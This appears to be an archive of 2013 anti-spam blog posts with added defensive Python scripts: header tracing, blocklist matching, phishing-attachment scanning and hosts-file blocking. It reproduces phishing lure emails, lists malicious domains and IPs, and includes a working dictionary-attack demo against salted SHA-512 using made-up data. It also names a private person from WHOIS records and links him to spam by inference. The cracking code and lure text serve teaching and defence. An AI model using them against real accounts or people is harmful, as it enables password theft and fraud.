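OVH's notice says the leaked password hashes are salted SHA-512 and that recovering a password "takes a lot of technical means" but "is possible". The following is an added illustration, not part of OVH's statement and not their actual construction (the notice gives no more detail than "salted, SHA-512 based"): it assumes the simplest form, H(salt || password), runs a dictionary attack against one such hash, and measures guess throughput next to PBKDF2-HMAC-SHA512 as the comparison point. The salt, wordlist and target password are constructed for the example. The point a practitioner should take from it is that the salt stops precomputed tables and cross-user batching, but a single fast hash per guess leaves a weak password within reach of an ordinary machine, which is why the advice to change it is sound.

```python
import hashlib
import time


def salted_sha512(password, salt):
    """Plain salted SHA-512, H(salt || password). An assumed construction for
    illustration; OVH's notice says only 'salted, SHA-512 based'."""
    return hashlib.sha512(salt + password.encode("utf-8")).hexdigest()


def slow_kdf(password, salt, iterations=100_000):
    """PBKDF2-HMAC-SHA512: same primitive, but each guess costs `iterations`
    hash calls. Added here as the comparison point, not as OVH's scheme."""
    return hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, iterations).hex()


def dictionary_attack(stored, salt, wordlist, hasher=salted_sha512):
    """Try every candidate against one stored hash; the salt is public, so
    it is simply prepended to each guess. Returns (password, guesses) or
    (None, guesses) if the wordlist is exhausted."""
    for n, candidate in enumerate(wordlist, 1):
        if hasher(candidate, salt) == stored:
            return candidate, n
    return None, len(wordlist)


def guesses_per_second(hasher, salt, n):
    """Measure throughput of one hasher so the two costs can be compared."""
    t0 = time.perf_counter()
    for i in range(n):
        hasher("candidate%d" % i, salt)
    return n / (time.perf_counter() - t0)


# Constructed demo data: a short wordlist and a weak password drawn from it.
WORDLIST = ["123456", "password", "qwerty", "letmein", "ovh2013", "summer13", "Passw0rd"]
SALT = b"\x1f\x9c\x03\xa2\x77\x4e\xbb\x10"  # fixed so the example is reproducible
STORED_HASH = salted_sha512("summer13", SALT)  # what a leaked database row would hold


def demo():
    """Recover the weak password and report guesses/second for both schemes."""
    found, tries = dictionary_attack(STORED_HASH, SALT, WORDLIST)
    fast = guesses_per_second(salted_sha512, SALT, 20_000)
    slow = guesses_per_second(slow_kdf, SALT, 3)
    return {"recovered": found, "tries": tries,
            "sha512_per_s": fast, "pbkdf2_per_s": slow}


if __name__ == "__main__":
    print(demo())
```

On a single CPU core the plain hash runs at hundreds of thousands of guesses per second in Python alone, and GPU crackers do orders of magnitude better; PBKDF2 at 100,000 iterations brings that down to a handful per second per core, which is the difference between a weekend and a lifetime for a moderately strong password.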


ygregistryltd.net / "Huasheng Ltd" domain scam

This is the same scam as this, this and this. Avoid.

From:     Jim Wang [jim.wang@ygregistryltd.net]
Date:     22 July 2013 15:29
Subject:     Regarding Asia/Cn/Hk domain name & Internet Keyword

Dear Manager,

(If you are not the person who is in charge of this, please forward this to your CEO,Thanks)

This email is from China domain name registration center, which mainly deal with the domain name registration in China and Asia. We received an application from Huasheng Ltd on July 22, 2013. They want to register " [redacted] " as their internet keyword and China/Asia/Hongkong (CN/ASIA/HK) domain names. But after checking it, we find this name conflicts with your company. In order to deal with this matter better, so we send you email and confirm whether this company is your distributor or business partner in China or not?

Best Regards,

Jim
General Manager
Shanghai Office (Head Office)
3002, Nanhai Building, No. 854 Nandan Road,
Xuhui District, Shanghai 200070, China
Tel: +86 216191 8696
Mobile: +86 1870199 4951
Fax: +86 216191 8697
Web: www.ygregistryltd.net

Note that all these domains are on the same server and can be considered scammy:
ygregistryltd.com
yg-registry.cn
ygregistry.cn
ygregistryltd.net

David Cameron's porn block - how will it work?

This government likes its half-baked ideas, and David Cameron's attempt to bring in mandatory porn blocking in the UK seems to be one of those daft ideas. Yes, ISPs should offer blocking if people want it, and perhaps they should be made to offer it by law. But there are a number of concerns which are well addressed by this New Statesman article.

Leaving aside the moral debate and the questions over who decides what, there is the tricky question of how ISPs would actually block access to porn.

DNS filtering

The simplest and quickest way to block it is DNS filtering: ISPs set their resolvers not to resolve adult sites, which you can already do with a service such as OpenDNS. The advantage is that it is fairly easy to implement and adds no latency to web traffic. The disadvantage, from the censor's point of view, is that it is trivially easy to bypass: simply change your DNS provider to one that doesn't block, or access the sites by IP address where they have dedicated servers (most big sites do).

Of course, if people bypass the filtering by using non-ISP resolvers, ISPs could firewall all outbound DNS requests that don't go to their own servers. But that would interfere with people's freedom to use Google, OpenDNS or other DNS providers if they want to.

Deep Packet Inspection

A more sophisticated approach is to inspect every packet and determine where it is going. This blocks sites even if the customer has chosen different DNS settings, and it can pick up and defeat a lot of common attempts to bypass filters. But this sort of thing is slow and expensive: ISPs would need to pass the costs on to consumers, and the added latency of filtering would make web surfing slower. Many businesses already use a form of this to protect their corporate networks, but they are prepared to put up with the downsides for the additional protection.

You could still use a proxy, VPN or Tor to get around it. HTTPS also defeats some elements of DPI because the payload is encrypted; there are ways around that, but they are extremely messy and have many drawbacks.

And of course there's the privacy issue. If ISPs are slurping all your data to this level, then who has access to it? Supporters of DPI may well have a hidden agenda.

IP address blocking

Instead of blocking domains, the IP addresses hosting pornography can be blocked. That's a pretty quick and easy solution too, but on shared hosting every site on an IP shares that address, so one "adult" site would get every other site on the same IP blocked with it. A lot of legitimate sites would be blocked as a result.


Anti-circumvention

ISPs could use a combination of the above to stop traffic. But it is relatively easy to use a proxy or VPN connection, so the next logical step would be to go to war with the providers of those services too. It is very difficult to stop people finding ways around blocks. And remember, we're not talking about illegal material here; we're talking about perfectly legal material being blocked by default.

So, in my opinion this approach will have the drawbacks of being a combination of ineffective, expensive and slow. More needs to be done to protect children from accidentally accessing material that they shouldn't have access to (and please could we include malware with that?), but this half-baked approach has the potential to be an expensive fiasco.

Saturday, 20 July 2013

Verizon Wireless "Data Usage Overage Alert" / verizonwirelessreports.com

This fake Verizon email leads to malware on the domain onemessage.verizonwireless.com.verizonwirelessreports.com:

Date:      Fri, 19 Jul 2013 10:48:31 -0500 [11:48:31 EDT]
From:      Verizon Wireless [VZWMail@e-marketing.verizonwireless-mail.net]
Subject:      Data Usage Overage Alert

Important Information About Your Account.      View Online
verizon wireless    Explore    Shop    My Verizon    Support
Important Information About Your Data Usage

Your account has used your data allowance for this month and you may now be billed overage charges. Your monthly data allowance will reset on the 20th.

Run an Account Analysis in My Verizon to analyze your recent months' data usage and review your plan options.

Don't forget, you can also manage your alert settings in My Verizon including adding recipients and opting out of specific alerts.
Thank you for choosing Verizon Wireless.
   
Details as of:
[redacted]

07/19/2013 02:15 AM EDT
We respect your privacy. Please review our privacy policy for more information
about click activity with Verizon Wireless and links included in this email.

This email was sent to [redacted];

ID: [redacted]

The link in the email goes through a legitimate hacked site and ends up on a malware landing page at [donotclick]onemessage.verizonwireless.com.verizonwirelessreports.com/news/verizon-bill.php (report here) hosted on:

172.255.106.126 (Nobis Technology Group, US / Creative Factory Beijing, China)
188.134.26.172 (Perspectiva Ltd, Russia)

The domain verizonwirelessreports.com is fake and was recently registered to an anonymous person. However, given the IPs and associated domains, this is clearly the work of this gang.
Blocklist:
172.255.106.126
188.134.26.172
verizonwirelessreports.com
firerice.com
onemessage.verizonwireless.com.verizonwirelessreports.com
package.ups.com.shanghaiherald.net
epackage.ups.com.shanghaiherald.net
vitans.net
www.klwines.com.order.complete.prysmm.net
prysmm.net
shanghaiherald.net



Friday, 19 July 2013

whoswhonetworkonline.com spam

This turd of an email was sent to an info@ email address on a domain I own. It appears to be a classic Who's Who scam.

From:     Who's Who [cpm2@contactwhoswho.us]
Reply-To:     databaseemailergroup@gmail.com
date:     19 July 2013 05:44
subject:     You were recently nominated into Who's Who Amoung Executives

Who's Who Network Online

Hello,

As you are probably aware, in the last few weeks, we at the Who's Who Among Executives and Proefssionals have reached out to several hundred individuals for placement in our upcoming 2013 edition of our directory.  You were contacted, but we did not receive any of your biographical information.  We would like to give you another opportunity to do so.

The publication's editors are now assembling the biographical profiles of today's leaders from the business world into one comprehensive source. Thousands of researchers at medical, academic, public and corporate libraries, as well as journalists and media professionals, rely upon the academic registry as a daily reference tool for obtaining information about the world's most experienced men and women at the C-Level in the private and public sectors. Inclusion in the publication is considered by many as a signal mark of achievement.

To be included in this prestigious publication, you need only provide the requested information by completing our online biographical data form. Please Click Here to fill out your form.

The information you provide will be evaluated according to the selection standards that the NAPN have developed over many years as the world's premier biographical compiler. If your data passes our initial screening, we will prepare your biography and send you a pre-publication proof for your verification and approval.

I congratulate you on the achievements that have brought your name to the attention of our editorial committee. We look forward to hearing from you.

Please remember: Inclusion of your biography in the Who's Who Registry carries neither cost nor commitment to you of any sort. Our continuing mission with each new edition is to prepare a biographies spanning the spectrum of noteworthy and accomplished men and women across all areas of the professional world.

                                             FILL OUT FORM HERE

Who's Who Network Online
2280 Grand Avenue, Baldwin, NY 11510

------------------------------------------

This email is intended only for the recipient(s) and is private.
If you receive our invitation in error please reply with unsubscribe in the subject line

Clicking on the link takes you to whoswhonetworkonline.com hosted on 66.11.129.87 (Stafford Associates Computer Specialists Inc., New York). The WHOIS details are hidden.

There's no clue anywhere on the site or in the email about who is behind the spam. There is no corporation in New York with the exact name "Who's Who Network Online" although there are several similar sounding entities.

However, there are some clues in the headers of the email that link it through to another recent and similarly-themed spam.

Received: from cpm2@contactwhoswho.us by [redacted] by uid 1002 with qmail-scanner-1.22
 ( Clear:RC:0(192.217.104.157):.
 Processed in 0.464627 secs); 19 Jul 2013 04:45:09 -0000
Received: from unknown (HELO whowho4.servername.com) (192.217.104.157)
  by [redacted] with SMTP; 19 Jul 2013 04:45:08 -0000
Received: from c-174-58-75-1.hsd1.fl.comcast.net ([174.58.75.1]:58694 helo=susie-HP.hsd1.fl.comcast.net.)
    by whowho4.servername.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
    (Exim 4.80.1)
    (envelope-from )
    id 1V02Z1-0000pJ-QW
    for [redacted]; Fri, 19 Jul 2013 08:45:08 +0400
Content-Type: multipart/alternative; boundary="===============0491393293=="


The email originates from a Comcast IP address of 174.58.75.1 in West Florida, and then routes through a server at 192.217.104.157 (NTT America) which has the hostname contactwhoswho.us, consistent with the cpm2@contactwhoswho.us sender address. So, who is contactwhoswho.us?

Registrant Name:                Darin Delia
Registrant Address1:            1321 Henry Ave
Registrant City:                Spring Hill
Registrant State/Province:      Florida
Registrant Postal Code:         34608
Registrant Country:             United States
Registrant Country Code:        US
Registrant Phone Number:        +1.5615964330
Registrant Email:               darindelia@gmail.com
Registrant Application Purpose: P1
Registrant Nexus Category:      C11


Darin Delia's address is also in West Florida (although some way from the theoretical location of the IP address). Darin Delia appears to be the same person who was sending out Spotlite Radio spam. Is Mr Delia merely a contractor sending out an email blast, or is he responsible for this so-called "Who's Who" outfit? I have no evidence one way or the other, but it seems he does have some sort of association with whoever is running these things.
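
The header trace above (bottom-most Received: line is the earliest hop, its source address is the origin as far as the headers can be trusted) can be done mechanically. The script below is an added example, not something from the original post; it parses the redacted header block quoted above with Python's standard email module and walks the chain back to the Comcast address. Any Received: line above a relay you do not control could be forged, so the result is only as trustworthy as the first relay you trust.

```python
"""Trace the Received: chain of an email back to its originating IP.

Added example (not part of the original post). Each relay prepends its own
Received: line, so the bottom-most line is the earliest hop and the address
it was received from is the origin, to the extent the headers are honest.
"""
import re
from email import message_from_string

# Sample input: the (already redacted) headers quoted in the post above.
SAMPLE_HEADERS = """\
Received: from cpm2@contactwhoswho.us by [redacted] by uid 1002 with qmail-scanner-1.22
 ( Clear:RC:0(192.217.104.157):.
 Processed in 0.464627 secs); 19 Jul 2013 04:45:09 -0000
Received: from unknown (HELO whowho4.servername.com) (192.217.104.157)
  by [redacted] with SMTP; 19 Jul 2013 04:45:08 -0000
Received: from c-174-58-75-1.hsd1.fl.comcast.net ([174.58.75.1]:58694 helo=susie-HP.hsd1.fl.comcast.net.)
    by whowho4.servername.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
    (Exim 4.80.1)
    (envelope-from )
    id 1V02Z1-0000pJ-QW
    for [redacted]; Fri, 19 Jul 2013 08:45:08 +0400
Content-Type: multipart/alternative; boundary="===============0491393293=="

"""

# Dotted-quad IPv4 literal; requiring four octets keeps it from matching
# version strings such as "Exim 4.80.1", and \b stops it matching mid-token.
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_received(raw_message):
    """Return one dict per Received: header, top (latest hop) first."""
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(value.split())  # unfold continuation lines
        m_from = re.search(r"\bfrom\s+(\S+)", text)
        m_by = re.search(r"\bby\s+(\S+)", text)
        hops.append({
            "from": m_from.group(1) if m_from else None,
            "by": m_by.group(1) if m_by else None,
            "ips": IPV4.findall(text),
        })
    return hops


def originating_ip(hops):
    """The earliest hop is the last Received: header; its first IP literal
    is the address the first relay saw the message arrive from."""
    for hop in reversed(hops):
        if hop["ips"]:
            return hop["ips"][0]
    return None


def relay_path(hops):
    """IP addresses along the path, earliest hop first, repeats collapsed."""
    path = []
    for hop in reversed(hops):
        for ip in hop["ips"]:
            if not path or path[-1] != ip:
                path.append(ip)
    return path


if __name__ == "__main__":
    hops = parse_received(SAMPLE_HEADERS)
    for hop in hops:
        print(f"from={hop['from']} by={hop['by']} ips={hop['ips']}")
    print("origin:", originating_ip(hops))
    print("path:  ", " -> ".join(relay_path(hops)))
```

On the sample this yields origin 174.58.75.1 and the path 174.58.75.1 -> 192.217.104.157, matching the analysis in the post; the qmail-scanner line on top repeats the relay's address rather than adding a hop.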

Thursday, 18 July 2013

K&L Wine Merchants (KLWines.com) spam / prysmm.net

This fake K&L Wine Merchants spam email leads to malware on www.klwines.com.order.complete.prysmm.net:


Date:      Thu, 18 Jul 2013 05:57:28 -0800
From:      drowsedl04@inbound.ups.net
CC:     
Subject:      Your K&L order #56920789 is complete

Hello from K&L Wine Merchants -- www.KLWines.com

Just wanted to let you know that your order (#56920789) is complete.

Additional comments for this order: Ship Fri. 7/19

The following items are included in this order:

------------------------------------------------------------------
 Item                               Price Shipped    Subtotal
------------------------------------------------------------------

 2009 Whitehall Lane Napa          $32.99     1        $32.99
     Valley Cabernet Sauvignon

 2007 Friggiali Brunello di        $28.99     2        $57.98
     Montalcino

 2010 Columbia Crest "H3"          $10.99     2        $21.98
     Horse Heaven Hills Washington
     Cabernet Sauvignon

 2010 Seven Hills Columbia         $19.99     1        $19.99
     Valley Cabernet Sauvignon

 2010 Bonaccorsi "Fiddlestix       $44.99     1        $44.99
     Vineyard" Sta. Rita Hills
     Pinot Noir

 2010 Melville "Estate" Santa      $25.99     1        $25.99
     Rita Hills Pinot Noir

 2007 La Fortuna Brunello di       $38.99     1        $38.99
     Montalcino

------------------------------------------------------------------
                Item Subtotal:    $247.91
                          Tax:      $0.00
          Shipping & Handling:     $67.18
                        Total:    $315.09

The shipping method for this order is UPS 2-Day, being sent to:

        Matthew Wright
        4025 sunset city plaza
        garden city, DC 13375 USA
      

The tracking number for this shipment is 1Z474482A140261050.
Please visit the freight carrier's site for exact shipping pickup and dropoff dates, by clicking on the link below. You may have to copy the link and paste it into your browser.
http://wwwapps.ups.com/etracking/tracking.cgi?TypeOfInquiryNumber=T&InquiryNumber1=1Z474482A140261050

To see the latest information about your order, visit "My Account" at http://www.klwines.com/account.asp. "My Account" lets you manage your orders online by giving you the ability to do the following:

* See your order status
* Change your e-mail address or password
* Update your billing and shipping information for future orders

You can also reach "My Account" by clicking on the link on the top of any page on our Web site.

If you need to get in touch with us about your orders, contact us via Contacts page.

Thank you for shopping at klwines.com -- we appreciate your business.

---------------------------------------------------------------------
K&L Wine Merchants
"Internet's Best Wine Site"  -- Money Magazine
questions@klwines.com             http://www.klwines.com/
---------------------------------------------------------------------

The link in the email goes through a legitimate hacked site and ends up on a malware page at [donotclick]www.klwines.com.order.complete.prysmm.net/news/order-information.php (report here) hosted on:


50.97.253.162 (Softlayer, US)
59.126.142.186 (Chungwa Telecom, Taiwan)
203.236.232.42 (KINX, Korea)
209.222.67.251 (Razor Inc, US)

The fake WHOIS details mark this out as belonging to the Amerika gang.

   Matamoros, Grace  freehotjob@yahoo.com
   6805 Laredo
   Houston, TX 77020
   US
   8322897755

Recommended blocklist:
50.97.253.162
59.126.142.186
203.236.232.42
209.222.67.251
autorize.net.models-and-kits.net
clik-kids.com
condalnua745746.ru
cpa.state.tx.us.tax-returns.mattwaltererie.net
ehnihenransivuennd.net
epackage.ups.com.shanghaiherald.net
erawppa.com
ermitirationifyouwau30.net
estateandpropertty.com
firerice.com
fulty.net
gebelikokulu.net
generationpasswaua40.net
gondamtvibnejnepl.net
greenleaf-investment.net
irs.gov.tax-refunds.ach.treehouse-dreams.net
klwines.com.order.complete.prysmm.net
linkedin.com-update-report.taltondark.net
m.krasalco.com
marriott.com.reservation.lookup.motobrio.net
marriott.com.reservation.lookup.viperlair.net
microsoftnotification.net
motobrio.net
mycanoweb.com
pass-hc.com
prysmm.net
quipbox.com
sendkick.com
taltondark.net
tax-returns.gov.cpa.state.us.gebelikokulu.net
treehouse-dreams.net
tvblips.net
twitter.com.greenleaf-investment.net
viperlair.net
vitans.net
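
The landing pages in this post and in the Verizon post above share a pattern: a real brand's domain (klwines.com, verizonwireless.com, ups.com) appears as subdomain labels under a throwaway registrable domain (prysmm.net, verizonwirelessreports.com, shanghaiherald.net), so a blocklist entry for the registrable domain has to cover everything beneath it. The script below is an added example, not tooling from the blog: BLOCKLIST and the test hostnames are copied from the posts, while BRANDS and the short TWO_PART_SUFFIXES table used to work out the registrable domain are simplifying assumptions for the example (a real deployment would use the Public Suffix List).

```python
"""Blocklist matching plus brand-in-subdomain detection for the hostnames
seen in these posts. Added example, not the blog's own code."""

# Entries copied from the recommended blocklists in the posts (subset).
BLOCKLIST = {
    "prysmm.net", "shanghaiherald.net", "verizonwirelessreports.com",
    "treehouse-dreams.net", "taltondark.net", "motobrio.net",
    "viperlair.net", "firerice.com", "vitans.net",
}

# Brand domains abused as subdomain labels in the lures (assumed list).
BRANDS = {
    "ups.com", "verizonwireless.com", "klwines.com", "marriott.com",
    "irs.gov", "linkedin.com", "twitter.com",
}

# Minimal set of two-label public suffixes; an assumption for this example.
TWO_PART_SUFFIXES = {"co.uk", "org.uk", "com.au", "co.jp"}


def _labels(host):
    return host.lower().rstrip(".").split(".")


def registrable_domain(host):
    """Domain the registrant actually controls: the last two labels, or
    three when the last two form a known public suffix such as co.uk."""
    labels = _labels(host)
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_PART_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_blocked(host, blocklist):
    """True if host equals a blocklist entry or sits under one, so an entry
    for prysmm.net also covers www.klwines.com.order.complete.prysmm.net."""
    labels = _labels(host)
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def lookalike_brand(host, brands):
    """Return the brand domain embedded in host's labels when the host is
    not actually registered under that brand, else None.

    The brand's labels must appear contiguously; the last label may also be
    extended with a hyphen, which catches linkedin.com-update-report.<junk>.
    """
    labels = _labels(host)
    if registrable_domain(host) in brands:
        return None  # genuinely one of the brand's own hosts
    for brand in sorted(brands):
        b = brand.split(".")
        n = len(b)
        for i in range(len(labels) - n + 1):
            window = labels[i:i + n]
            tail_ok = window[-1] == b[-1] or window[-1].startswith(b[-1] + "-")
            if window[:-1] == b[:-1] and tail_ok:
                return brand
    return None


def triage(hosts, blocklist=BLOCKLIST, brands=BRANDS):
    """Summarise each hostname as (host, blocked?, abused brand or None)."""
    return [(h, is_blocked(h, blocklist), lookalike_brand(h, brands)) for h in hosts]


if __name__ == "__main__":
    sample = [
        "www.klwines.com.order.complete.prysmm.net",
        "onemessage.verizonwireless.com.verizonwirelessreports.com",
        "package.ups.com.shanghaiherald.net",
        "linkedin.com-update-report.taltondark.net",
        "www.klwines.com",
    ]
    for row in triage(sample):
        print(row)
```

The lookalike check is useful on its own for hosts that are not yet on any blocklist: a brand domain sitting in the middle of a hostname whose registrable domain is something else is a strong signal regardless of the domain's age.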

primrose.co.uk hacked, email addresses compromised

Garden accessory site primrose.co.uk has been hacked, and email addresses stored in their system are being abused for phishing purposes:

From:     paypal.co.uk [service@paypal.co.uk]
Date:     18 July 2013 11:01
Subject:     We cannot process your payment at this time.

   
Dear,

We need your help resolving an issue with your account.To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.
we understand it may be frustrating not to have full access to your PayPal account.We want to work with you to get your account back to normal as quickly as possible.
What's the problem ?

It's been a little while since you used your account.For reasons relating to the safe use of the PayPal service we need some more information about your account.

Reference Number: PP-001-278-254-803

It's usually quite straight forward to take care of these things.Most of the time, we just need some more information about your account or latest transactions.

1.
    Download the attached document and open it in a browser window secure.
2.
    Confirm that you are the account holder and follow the instructions.

Yours sincerely,
PayPal
   

Copyright 2013 PayPal. All rights reserved PayPal Email ID PP1589

The attached form Account Information-Paypal.html is basically a phishing page, pulling content from www.thesenddirect.com (62.149.142.113 - Aruba, Italy) and submitting the data to www.paypserv.com (62.149.142.152 - also Aruba). The WHOIS details are no doubt fake and are respectively:

Saunders, John Alan  mahibarayanlol@gmail.com
4 The Laurels off Oatland Close Botley, 4
Southampton, GB SO322EN
IT
+39.447885623455

----------

Clarke, Victoria  johanjo1010@gmail.com
Innex Cottage Ropers Lane, 754
Wrington, GB BS405NH
IT
+39.441934862064


Primrose.co.uk were informed of the breach on 4th July and told me that IT were investigating, but as I haven't heard anything back and customers haven't been notified, I will assume they did not find anything.

Of note is that the spam email does not address customers by name, so it is possibly only email addresses that have been leaked. Also, passwords do not appear to be kept in plaintext which is good. Without further information from primrose.co.uk it is impossible to say if any financial data has been compromised.
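
An HTML attachment of the kind described above gives itself away statically: the page's resources load from one host and its form posts to another, neither of which belongs to the brand it impersonates. The script below is an added example, not the blog's own tooling. The HTML it scans is a constructed stand-in for the "Account Information-Paypal.html" attachment (the real file was not available here), using the two hostnames the post names; CLAIMED_BRAND is an assumption for the example. Nothing is fetched, the parser only reads attributes.

```python
"""Static triage of an HTML attachment: where does it load content from,
where does its form submit to, and does it ask for credentials?
Added example, not from the original post."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample standing in for the phishing attachment described above.
SAMPLE_ATTACHMENT = """\
<html><head><title>PayPal</title>
<link rel="stylesheet" href="http://www.thesenddirect.com/css/style.css">
</head><body>
<img src="http://www.thesenddirect.com/img/logo.png">
<form method="post" action="http://www.paypserv.com/verify.php">
  <input name="email"><input name="password" type="password">
  <input name="card"><input type="submit" value="Confirm">
</form>
</body></html>
"""

CLAIMED_BRAND = "paypal.com"  # brand the lure impersonates (assumed)
SENSITIVE_NAMES = {"password", "passwd", "card", "cardnumber", "cvv", "ssn"}


class AttachmentScanner(HTMLParser):
    """Collects external resource hosts, form actions and credential fields."""

    def __init__(self):
        super().__init__()
        self.resource_hosts = set()
        self.form_actions = []
        self.sensitive_fields = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        url = a.get("src") or a.get("href")
        if tag in ("img", "script", "link", "iframe") and url:
            host = urlparse(url).hostname
            if host:
                self.resource_hosts.add(host.lower())
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        if tag == "input":
            name = (a.get("name") or "").lower()
            kind = (a.get("type") or "text").lower()
            if kind == "password" or name in SENSITIVE_NAMES:
                self.sensitive_fields.append(name or kind)


def scan_attachment(html, brand=CLAIMED_BRAND):
    """Return a summary dict; 'suspicious' is set when credential-type
    fields are posted to a host outside the claimed brand's domain."""
    p = AttachmentScanner()
    p.feed(html)
    action_hosts = set()
    for u in p.form_actions:
        host = urlparse(u).hostname
        if host:
            action_hosts.add(host.lower())
    offsite = {h for h in action_hosts if h != brand and not h.endswith("." + brand)}
    return {
        "resource_hosts": sorted(p.resource_hosts),
        "form_action_hosts": sorted(action_hosts),
        "credential_fields": p.sensitive_fields,
        "suspicious": bool(offsite and p.sensitive_fields),
    }


if __name__ == "__main__":
    for key, value in scan_attachment(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

Run over the sample, the form action host (www.paypserv.com) and the resource host (www.thesenddirect.com) come out separately, which is exactly the split the post describes; the action host is the one to prioritise for blocking, since that is where the harvested data goes.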

Wednesday, 17 July 2013

02086 547426 "PC Wizard" tech support scam

Just a quick one.. some Indian scammers routing through a UK number 02086 547426 (02086547426) and purporting to be from a company "PC Wizard" just called and tried to convince me that something was wrong with my PC.

I'll do a write up later.. but in the meantime their MO is to get you to look at your Event Viewer for errors (there are always errors), and then get you to visit ammyy.com to run some remote control software. DO NOT LET THEM DO THIS!

Update:
I know this type of scam is quite common, and ammyy.com even admits that it is often abused in this way. There was a degree of sophistication here though in that they had a close approximation of my wife's name and we have an unlisted telephone number.

There were two operatives, the first one handles the initial part of the call and makes you open up your Event Viewer to look for errors and warnings (there are always some of those) and then warns you not to open the warnings or you will damage the computer. Operative number one had an Indian accent and sounded like they were coming in over a voice-over-IP connection.

Once they have you hooked, you get connected to a second Indian operator who attempts to connect to your computer with the ammyy.com remote control software. In this case it was operator 6070592.

After mucking the operator around for 20 minutes I confronted them with what they were doing. He was unapologetic and full of bullshit, and was still trying to connect to my machine.

Of course, the whole thing is a scam. I don't have a support contract for my version of Windows, the errors in my Event Viewer were harmless.. but if I had let the operator take control of my machine then he could have installed any sort of malware on it, or trashed the machine and then charged me a fortune to fix it.

I've been working in the IT field for almost 25 years and frankly it was obvious in the first few seconds that this was a scam. But for a naive user it might seem credible. If (like me) you end up doing tech support for your relatives, it might be a good idea to edit the PC's hosts file to block ammyy.com and www.ammyy.com:

0.0.0.0     ammyy.com
0.0.0.0     www.ammyy.com
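
If you maintain a few relatives' PCs, the two hosts-file lines above are easier to apply repeatably with a small script than by hand. The one below is an added example, not from the original post: it parses the existing hosts file (comments and multi-name lines included) and appends a 0.0.0.0 entry only for names that are not already mapped, so running it twice changes nothing and a deliberate existing entry is never overridden. The Windows path is the standard location for the hosts file; on Linux or macOS it is /etc/hosts. Writing the file needs administrator rights.

```python
"""Idempotently add sinkhole entries to a hosts file.
Added example, not the blog's own code."""

SINK = "0.0.0.0"  # the post maps the names to 0.0.0.0 (non-routable)
WINDOWS_HOSTS = r"C:\Windows\System32\drivers\etc\hosts"


def parse_hosts(text):
    """Return {hostname: address} for every active (non-comment) mapping."""
    mapping = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        fields = line.split()
        address, names = fields[0], fields[1:]
        for name in names:
            mapping[name.lower()] = address
    return mapping


def merge_block_entries(text, names, sink=SINK):
    """Return hosts-file text with a `sink name` line appended for each name
    not already mapped. Existing lines, including comments, are untouched;
    a name already mapped to any address is left alone rather than
    silently redirected."""
    present = parse_hosts(text)
    missing = [n for n in names if n.lower() not in present]
    if not missing:
        return text
    out = text if (not text or text.endswith("\n")) else text + "\n"
    out += "".join(f"{sink}\t{n}\n" for n in missing)
    return out


def update_hosts_file(path, names, sink=SINK):
    """Read, merge and write back; returns the names that were added."""
    with open(path, "r", encoding="utf-8") as fh:
        before = fh.read()
    after = merge_block_entries(before, names, sink)
    if after != before:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(after)
    present = parse_hosts(before)
    return [n for n in names if n.lower() not in present]


if __name__ == "__main__":
    # Constructed sample of an existing hosts file; ammyy.com already blocked.
    sample = "# local names\n127.0.0.1\tlocalhost\n0.0.0.0\tammyy.com  # already blocked\n"
    print(merge_block_entries(sample, ["ammyy.com", "www.ammyy.com"]))
    # To apply on a real machine (run elevated):
    # print(update_hosts_file(WINDOWS_HOSTS, ["ammyy.com", "www.ammyy.com"]))
```

Note that this only blocks name resolution on that one PC; the scammers can give the victim an IP address or a different tool, so it is a speed bump for the conversation ("the site doesn't work") rather than a real control.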